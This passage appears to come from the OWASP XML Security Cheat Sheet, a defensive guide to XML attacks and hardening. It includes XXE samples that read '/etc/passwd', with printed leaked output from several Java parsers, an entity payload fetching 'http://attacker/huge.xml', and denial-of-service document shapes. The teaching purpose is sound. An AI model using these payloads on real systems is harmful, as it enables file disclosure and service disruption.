Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document's noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.

The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#malformed-document-to-malformed-document","title":"Malformed Document to Malformed Document","text":"

According to the XML specification, the string -- (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:

<element>\n<!-- one\n  <!-- another comment\n comment -->\n</element>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#well-formed-document-to-well-formed-document-normalized","title":"Well-Formed Document to Well-Formed Document Normalized","text":"

Certain parsers may normalize the contents of your CDATA sections. This means that they will update the special characters contained in the CDATA section to their safe versions, even though this is not required:

<element>\n<![CDATA[<script>a=1;</script>]]>\n</element>\n

Normalization of a CDATA section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:

<element>\n&lt;script&gt;a=1;&lt;/script&gt;\n</element>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#coercive-parsing","title":"Coercive Parsing","text":"

A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine's resources and cause a denial of service on the target. Reports of a DoS attack in Firefox 3.6.7 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack, since only half the size of a well-formed document is required to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this:

<A1>\n<A2>\n<A3>\n...\n    <A30000>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#violation-of-xml-specification-rules","title":"Violation of XML Specification Rules","text":"

Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#invalid-xml-documents","title":"Invalid XML Documents","text":"

Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.

The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.
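
As a hedged illustration of the local-copy approach, a Java sketch using JAXP schema validation (the class name and file names are placeholders, not part of the cheat sheet) might look like this:

import javax.xml.XMLConstants;\nimport javax.xml.transform.stream.StreamSource;\nimport javax.xml.validation.Schema;\nimport javax.xml.validation.SchemaFactory;\nimport javax.xml.validation.Validator;\nimport java.io.File;\n\n// Hypothetical example: validate an incoming document against a local, known-good\n// copy of the schema instead of any schema reference embedded in the document.\npublic class LocalSchemaValidation {\npublic static void main(String[] args) throws Exception {\nSchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);\n// Refuse to fetch external DTDs or schemas over the network\nfactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\nfactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\");\nSchema schema = factory.newSchema(new File(\"local-copy-of-schema.xsd\"));\nValidator validator = schema.newValidator();\nvalidator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\nvalidator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\");\nvalidator.validate(new StreamSource(new File(\"incoming-document.xml\")));\n}\n}\n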

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#document-without-schema","title":"Document without Schema","text":"

Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an id value related to an item and a certain price. The user may only introduce a certain id value using the web interface:

<buy>\n<id>123</id>\n<price>10</price>\n</buy>\n

If there is no control on the document's structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:

<buy>\n<id>123</id><price>0</price><id></id>\n<price>10</price>\n</buy>\n

Notice again how the value 123 is supplied as an id, but now the document includes additional opening and closing tags. The attacker closes the id element and sets a bogus price element to the value 0. The final step to keep the structure well formed is to add one empty id element. After this, the application adds the closing tag for id and sets the price to 10. If the application processes only the first values provided for the id and the price without performing any control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#unrestrictive-schema","title":"Unrestrictive Schema","text":"

Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using a DTD; it has a very limited set of possibilities compared to the types of restrictions that can be applied in XML Schemas. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person's age is validated against an inline DTD schema:

<!DOCTYPE person [\n <!ELEMENT person (name, age)>\n<!ELEMENT name (#PCDATA)>\n<!ELEMENT age (#PCDATA)>\n]>\n<person>\n<name>John Doe</name>\n<age>11111..(1.000.000digits)..11111</age>\n</person>\n

The previous document contains an inline DTD with a root element named person. This element contains two elements in a specific order: name and then age. The element name is then defined to contain PCDATA as well as the element age. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the age element contains one million digits. Since there are no restrictions on the maximum size for the age element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign). If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element name or a valid range for the element age), this type of schema increases the risk of affecting the integrity and availability of resources.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#improper-data-validation","title":"Improper Data Validation","text":"

When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors, or documents that affect the application's functionality with unexpected values.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#string-data-types","title":"String Data Types","text":"

If you need to use a hexadecimal value, there is no point in defining it as an unconstrained string when it could be restricted to the 16 hexadecimal characters. To exemplify this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:

<element name=\"CipherData\" type=\"xenc:CipherDataType\"/>\n<complexType name=\"CipherDataType\">\n<choice>\n<element name=\"CipherValue\" type=\"base64Binary\"/>\n<element ref=\"xenc:CipherReference\"/>\n</choice>\n</complexType>\n

The previous schema defines the element CipherValue as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value and considered it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the CipherData element). Restrictions are only partially set for the element, which means that the information is probably tested by an application instead of the proposed sample schema.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#numeric-data-types","title":"Numeric Data Types","text":"

Defining the correct data type for numbers can be more complex since there are more options than there are for strings.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#negative-and-positive-restrictions","title":"Negative and Positive Restrictions","text":"

XML Schema numeric data types can include different ranges of numbers. They could include:

The following sample document defines an id for a product, a price, and a quantity value that is under the control of an attacker:

<buy>\n<id>1</id>\n<price>10</price>\n<quantity>1</quantity>\n</buy>\n

To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:

<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\n<xs:element name=\"buy\">\n<xs:complexType>\n<xs:sequence>\n<xs:element name=\"id\" type=\"xs:integer\"/>\n<xs:element name=\"price\" type=\"xs:decimal\"/>\n<xs:element name=\"quantity\" type=\"xs:integer\"/>\n</xs:sequence>\n</xs:complexType>\n</xs:element>\n</xs:schema>\n

Limiting the quantity to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing price*quantity. However, since this data type may allow negative values, an attacker could provide a negative number and produce a negative result on the user's account. What you probably want here, to avoid that logical vulnerability, is positiveInteger instead of integer.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#divide-by-zero","title":"Divide by Zero","text":"

Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error FOAR0001 will occur. Other applications may throw other exceptions, and the program may crash. There are XML schema data types that specifically exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type positiveInteger for the element.

<xs:element name=\"denominator\">\n<xs:simpleType>\n<xs:restriction base=\"xs:positiveInteger\"/>\n</xs:simpleType>\n</xs:element>\n

The element denominator is now restricted to positive integers. This means that only values greater than zero will be considered valid. If any other type of restriction is used, a zero denominator may trigger an error.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#special-values-infinity-and-not-a-number-nan","title":"Special Values: Infinity and Not a Number (NaN)","text":"

The data types float and double contain real numbers and some special values: -Infinity or -INF, NaN, and +Infinity or INF. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies. Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values Infinity and NaN are not required and only real numbers are expected, the data type decimal is recommended:

<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\n<xs:element name=\"buy\">\n<xs:complexType>\n<xs:sequence>\n<xs:element name=\"id\" type=\"xs:integer\"/>\n<xs:element name=\"price\" type=\"xs:decimal\"/>\n<xs:element name=\"quantity\" type=\"xs:positiveInteger\"/>\n</xs:sequence>\n</xs:complexType>\n</xs:element>\n</xs:schema>\n

Because Infinity and NaN are not valid decimal values, a price set to one of them will be rejected during validation rather than causing errors later. An attacker could exploit this issue if those values were allowed.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#general-data-restrictions","title":"General Data Restrictions","text":"

After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#prefixed-values","title":"Prefixed Values","text":"

Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. It is possible for the schema to have these restrictions in place for each element or attribute. This is the ideal allow-list scenario for an application: only specific values will be accepted. Such a constraint is called an enumeration in XML schema. The following example restricts the contents of the element month to 12 possible values:

<xs:element name=\"month\">\n<xs:simpleType>\n<xs:restriction base=\"xs:string\">\n<xs:enumeration value=\"January\"/>\n<xs:enumeration value=\"February\"/>\n<xs:enumeration value=\"March\"/>\n<xs:enumeration value=\"April\"/>\n<xs:enumeration value=\"May\"/>\n<xs:enumeration value=\"June\"/>\n<xs:enumeration value=\"July\"/>\n<xs:enumeration value=\"August\"/>\n<xs:enumeration value=\"September\"/>\n<xs:enumeration value=\"October\"/>\n<xs:enumeration value=\"November\"/>\n<xs:enumeration value=\"December\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n

By limiting the month element's value to any of the previous values, the application will not be manipulating random strings.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#ranges","title":"Ranges","text":"

Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:

<xs:element name=\"name\">\n<xs:simpleType>\n<xs:restriction base=\"xs:string\">\n<xs:minLength value=\"3\"/>\n<xs:maxLength value=\"256\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n

In cases where the value must have one specific length (say, 8), that length can be specified as follows:

<xs:element name=\"name\">\n<xs:simpleType>\n<xs:restriction base=\"xs:string\">\n<xs:length value=\"8\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#patterns","title":"Patterns","text":"

Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:

<xs:element name=\"SSN\">\n<xs:simpleType>\n<xs:restriction base=\"xs:token\">\n<xs:pattern value=\"[0-9]{3}-[0-9]{2}-[0-9]{4}\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n

Only numbers between 000-00-0000 and 999-99-9999 will be allowed as values for a SSN.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#assertions","title":"Assertions","text":"

Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable $value can be used to reference the contents of the value being analyzed. The Divide by Zero section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:

<xs:element name=\"denominator\">\n<xs:simpleType>\n<xs:restriction base=\"xs:integer\">\n<xs:assertion test=\"$value != 0\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n

The assertion guarantees that the denominator will never be zero, while still allowing negative numbers as valid denominators.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#occurrences","title":"Occurrences","text":"

Failing to define a maximum number of occurrences leaves the application to cope with whatever happens when it receives an extreme number of items to process. Two attributes specify minimum and maximum limits: minOccurs and maxOccurs. The default value for both attributes is 1, but certain elements may require other values. For instance, if a value is optional it could use a minOccurs of 0, and if there is no limit on the maximum amount it could use a maxOccurs of unbounded, as in the following example:

<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\n<xs:element name=\"operation\">\n<xs:complexType>\n<xs:sequence>\n<xs:element name=\"buy\" maxOccurs=\"unbounded\">\n<xs:complexType>\n<xs:all>\n<xs:element name=\"id\" type=\"xs:integer\"/>\n<xs:element name=\"price\" type=\"xs:decimal\"/>\n<xs:element name=\"quantity\" type=\"xs:integer\"/>\n</xs:all>\n</xs:complexType>\n</xs:element>\n</xs:complexType>\n</xs:element>\n</xs:schema>\n

The previous schema includes a root element named operation, which can contain an unlimited (unbounded) number of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and, where possible, a concrete maximum should be used instead of an unbounded value.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#jumbo-payloads","title":"Jumbo Payloads","text":"

Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack on its own. Instead, an attacker will look for ways to minimize the CPU and traffic needed to generate the attack relative to the server CPU and traffic required to handle the requests.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#traditional-jumbo-payloads","title":"Traditional Jumbo Payloads","text":"

There are two primary methods to make a document larger than normal: a depth attack, which uses a huge number of elements, element names, and/or element values; and a width attack, which uses a huge number of attributes, attribute names, and/or attribute values.

In most cases, the overall result will be a huge document. This is a short example of what this looks like:

<SOAPENV:ENVELOPE XMLNS:SOAPENV=\"HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/\"\nXMLNS:EXT=\"HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL\">\n<SOAPENV:HEADER LARGENAME1=\"LARGEVALUE\"\nLARGENAME2=\"LARGEVALUE2\"\nLARGENAME3=\"LARGEVALUE3\" \u2026>\n...\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#small-jumbo-payloads","title":"\"Small\" Jumbo Payloads","text":"

The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:

<?xml version=\"1.0\"?>\n<!DOCTYPE root [\n <!ENTITY file SYSTEM \"http://attacker/huge.xml\" >\n]>\n<root>&file;</root>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#schema-poisoning","title":"Schema Poisoning","text":"

When an attacker is capable of introducing modifications to a schema, there can be multiple high-risk consequences; these are especially dangerous when the schema is a DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#local-schema-poisoning","title":"Local Schema Poisoning","text":"

Local schema poisoning happens when the schema is available on the same host, whether or not it is embedded in the same XML document.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#embedded-schema","title":"Embedded Schema","text":"

The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following (unintentionally vulnerable) example provided by the W3C:

<?xml version=\"1.0\"?>\n<!DOCTYPE note [\n <!ELEMENT note (to,from,heading,body)>\n<!ELEMENT to (#PCDATA)>\n<!ELEMENT from (#PCDATA)>\n<!ELEMENT heading (#PCDATA)>\n<!ELEMENT body (#PCDATA)>\n]>\n<note>\n<to>Tove</to>\n<from>Jani</from>\n<heading>Reminder</heading>\n<body>Don't forget me this weekend</body>\n</note>\n

All restrictions on the note element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server processes external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema serves only as a suggestion for how a document is sent; to be used safely there must be a way to check the integrity of the embedded schema. Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#incorrect-permissions","title":"Incorrect Permissions","text":"

You can often avoid the risk of processing remotely tampered versions by using a local schema:

<!DOCTYPE note SYSTEM \"note.dtd\">\n<note>\n<to>Tove</to>\n<from>Jani</from>\n<heading>Reminder</heading>\n<body>Don't forget me this weekend</body>\n</note>\n

However, if the local schema does not have the correct permissions, an internal attacker could alter the original restrictions. The following line shows a schema whose permissions allow any user to make modifications:

-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd\n

The permissions set on note.dtd allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#remote-schema-poisoning","title":"Remote Schema Poisoning","text":"

Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network's traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#man-in-the-middle-mitm-attack","title":"Man-in-the-Middle (MitM) Attack","text":"

When documents reference remote schemas over the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker can sniff and modify the traffic before it reaches the end user:

<!DOCTYPE note SYSTEM \"http://example.com/note.dtd\">\n<note>\n<to>Tove</to>\n<from>Jani</from>\n<heading>Reminder</heading>\n<body>Don't forget me this weekend</body>\n</note>\n

The remote file note.dtd could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#dns-cache-poisoning","title":"DNS-Cache Poisoning","text":"

Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.

The previous example referenced the host example.com using an unencrypted protocol.

When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:

$\u00a0host\u00a0example.com\nexample.com\u00a0has\u00a0address\u00a01.1.1.1\n

If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker, 2.2.2.2:

$\u00a0host\u00a0example.com\nexample.com\u00a0has\u00a0address\u00a02.2.2.2\n

When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by the attacker.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#evil-employee-attack","title":"Evil Employee Attack","text":"

When third parties host and define schemas, the contents are not under the control of the schemas' users. Any modifications introduced by a malicious employee, or by an external attacker in control of these files, could impact all users processing the schemas. Attackers could then affect the confidentiality, integrity, or availability of other services (especially if the schema in use is a DTD).

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xml-entity-expansion","title":"XML Entity Expansion","text":"

If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#sample-vulnerable-java-implementations","title":"Sample Vulnerable Java Implementations","text":"

Using the DTD's capability of referencing local or remote files, it is possible to affect confidentiality. In addition, it is also possible to affect the availability of resources if no proper restrictions have been set for entity expansion. Consider the following example code of an XXE.

Sample XML:

<!DOCTYPE contacts SYSTEM \"contacts.dtd\">\n<contacts>\n<contact>\n<firstname>John</firstname>\n<lastname>&xxe;</lastname>\n</contact>\n</contacts>\n

Sample DTD:

<!ELEMENT contacts (contact*)>\n<!ELEMENT contact (firstname,lastname)>\n<!ELEMENT firstname (#PCDATA)>\n<!ELEMENT lastname ANY>\n<!ENTITY xxe SYSTEM \"/etc/passwd\">\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xxe-using-dom","title":"XXE using DOM","text":"
import java.io.IOException;\nimport javax.xml.parsers.DocumentBuilder;\nimport javax.xml.parsers.DocumentBuilderFactory;\nimport javax.xml.parsers.ParserConfigurationException;\nimport org.xml.sax.InputSource;\nimport org.w3c.dom.Document;\nimport org.w3c.dom.Element;\nimport org.w3c.dom.Node;\nimport org.w3c.dom.NodeList;\n\npublic class parseDocument {\npublic static void main(String[] args) {\ntry {\nDocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();\nDocumentBuilder builder = factory.newDocumentBuilder();\nDocument doc = builder.parse(new InputSource(\"contacts.xml\"));\nNodeList nodeList = doc.getElementsByTagName(\"contact\");\nfor (int s = 0; s < nodeList.getLength(); s++) {\nNode firstNode = nodeList.item(s);\nif (firstNode.getNodeType() == Node.ELEMENT_NODE) {\nElement firstElement = (Element) firstNode;\nNodeList firstNameElementList = firstElement.getElementsByTagName(\"firstname\");\nElement firstNameElement = (Element) firstNameElementList.item(0);\nNodeList firstName = firstNameElement.getChildNodes();\nSystem.out.println(\"First Name: \"  + ((Node) firstName.item(0)).getNodeValue());\nNodeList lastNameElementList = firstElement.getElementsByTagName(\"lastname\");\nElement lastNameElement = (Element) lastNameElementList.item(0);\nNodeList lastName = lastNameElement.getChildNodes();\nSystem.out.println(\"Last Name: \" + ((Node) lastName.item(0)).getNodeValue());\n}\n}\n} catch (Exception e) {\ne.printStackTrace();\n}\n}\n}\n

The previous code produces the following output:

$ javac parseDocument.java ; java parseDocument\nFirst Name: John\nLast Name: ### User Database\n...\nnobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false\nroot:*:0:0:System Administrator:/var/root:/bin/sh\n
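
A minimal hardening sketch for the same DOM parse, assuming the JDK's built-in JAXP/Xerces parser, could look like the following. The class name parseDocumentSafely is illustrative only; the feature URIs are the standard SAX/Xerces feature names:

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

public class parseDocumentSafely {
    public static void main(String[] args) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Refuse any document that declares a DOCTYPE (Xerces-specific feature,
        // supported by the JDK's built-in parser).
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Fallback settings in case DTD support has to remain enabled.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        // Turn on the JAXP secure-processing limits (entity expansion, etc.).
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

        DocumentBuilder builder = factory.newDocumentBuilder();
        // With disallow-doctype-decl enabled, parsing contacts.xml now fails
        // with a SAXParseException instead of expanding the xxe entity.
        Document doc = builder.parse(new InputSource("contacts.xml"));
        System.out.println(doc.getDocumentElement().getNodeName());
    }
}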
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xxe-using-dom4j","title":"XXE using DOM4J","text":"
import org.dom4j.Document;\nimport org.dom4j.DocumentException;\nimport org.dom4j.io.SAXReader;\nimport org.dom4j.io.OutputFormat;\nimport org.dom4j.io.XMLWriter;\n\npublic class test1 {\npublic static void main(String[] args) {\nDocument document = null;\ntry {\nSAXReader reader = new SAXReader();\ndocument = reader.read(\"contacts.xml\");\n} catch (Exception e) {\ne.printStackTrace();\n}\nOutputFormat format = OutputFormat.createPrettyPrint();\ntry {\nXMLWriter writer = new XMLWriter( System.out, format );\nwriter.write( document );\n} catch (Exception e) {\ne.printStackTrace();\n}\n}\n}\n

The previous code produces the following output:

$ java test1\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE contacts SYSTEM \"contacts.dtd\">\n\n<contacts>\n <contact>\n  <firstname>John</firstname>\n  <lastname>### User Database\n...\nnobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false\nroot:*:0:0:System Administrator:/var/root:/bin/sh\n
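
A similar sketch applies to DOM4J, assuming the SAXReader in use exposes the underlying SAX/Xerces features through setFeature; the class name test1Safe is illustrative only:

import org.dom4j.Document;
import org.dom4j.io.SAXReader;

public class test1Safe {
    public static void main(String[] args) throws Exception {
        SAXReader reader = new SAXReader();
        // Same Xerces feature as in the DOM example: reject any DOCTYPE outright.
        reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // If DOCTYPEs cannot be rejected, at least stop external entity resolution.
        reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
        reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

        Document document = reader.read("contacts.xml");
        System.out.println(document.getRootElement().getName());
    }
}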
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xxe-using-sax","title":"XXE using SAX","text":"
import java.io.IOException;\nimport javax.xml.parsers.SAXParser;\nimport javax.xml.parsers.SAXParserFactory;\nimport org.xml.sax.SAXException;\nimport org.xml.sax.helpers.DefaultHandler;\n\npublic class parseDocument extends DefaultHandler {\npublic static void main(String[] args) {\nnew parseDocument();\n}\npublic parseDocument() {\ntry {\nSAXParserFactory factory = SAXParserFactory.newInstance();\nSAXParser parser = factory.newSAXParser();\nparser.parse(\"contacts.xml\", this);\n} catch (Exception e) {\ne.printStackTrace();\n}\n}\n@Override\npublic void characters(char[] ac, int i, int j) throws SAXException {\nString tmpValue = new String(ac, i, j);\nSystem.out.println(tmpValue);\n}\n}\n

The previous code produces the following output:

$ java parseDocument\nJohn\n#### User Database\n...\nnobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false\nroot:*:0:0:System Administrator:/var/root:/bin/sh\n
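
The SAX example can be hardened in the same way. A minimal sketch using SAXParserFactory.setFeature follows; the class name parseDocumentSafeSax is illustrative only:

import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.helpers.DefaultHandler;

public class parseDocumentSafeSax extends DefaultHandler {
    public static void main(String[] args) throws Exception {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        // Reject documents containing a DOCTYPE (Xerces feature, supported by the JDK parser).
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Fallback features if DTD support has to stay on.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

        SAXParser parser = factory.newSAXParser();
        parser.parse("contacts.xml", new parseDocumentSafeSax());
    }

    @Override
    public void characters(char[] ac, int i, int j) {
        // Only character data from the document itself is printed;
        // the xxe entity is never expanded.
        System.out.println(new String(ac, i, j));
    }
}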
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xxe-using-stax","title":"XXE using StAX","text":"
import javax.xml.parsers.SAXParserFactory;\nimport javax.xml.stream.XMLStreamReader;\nimport javax.xml.stream.XMLInputFactory;\nimport java.io.File;\nimport java.io.FileReader;\nimport java.io.FileInputStream;\n\npublic class parseDocument {\npublic static void main(String[] args) {\ntry {\nXMLInputFactory xmlif = XMLInputFactory.newInstance();\nFileReader fr = new FileReader(\"contacts.xml\");\nFile file = new File(\"contacts.xml\");\nXMLStreamReader xmlfer = xmlif.createXMLStreamReader(\"contacts.xml\",\nnew FileInputStream(file));\nint eventType = xmlfer.getEventType();\nwhile (xmlfer.hasNext()) {\neventType = xmlfer.next();\nif(xmlfer.hasText()){\nSystem.out.print(xmlfer.getText());\n}\n}\nfr.close();\n} catch (Exception e) {\ne.printStackTrace();\n}\n}\n}\n

The previous code produces the following output:

$ java parseDocument\n<!DOCTYPE contacts SYSTEM \"contacts.dtd\">John### User Database\n...\nnobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false\nroot:*:0:0:System Administrator:/var/root:/bin/sh\n
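
For StAX, the analogous sketch disables DTD support and external entity resolution on the XMLInputFactory. The class name parseDocumentSafeStax is illustrative only, and whether a DOCTYPE is then ignored or rejected depends on the StAX implementation:

import java.io.FileInputStream;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamReader;

public class parseDocumentSafeStax {
    public static void main(String[] args) throws Exception {
        XMLInputFactory xmlif = XMLInputFactory.newInstance();
        // Disable DTD processing entirely.
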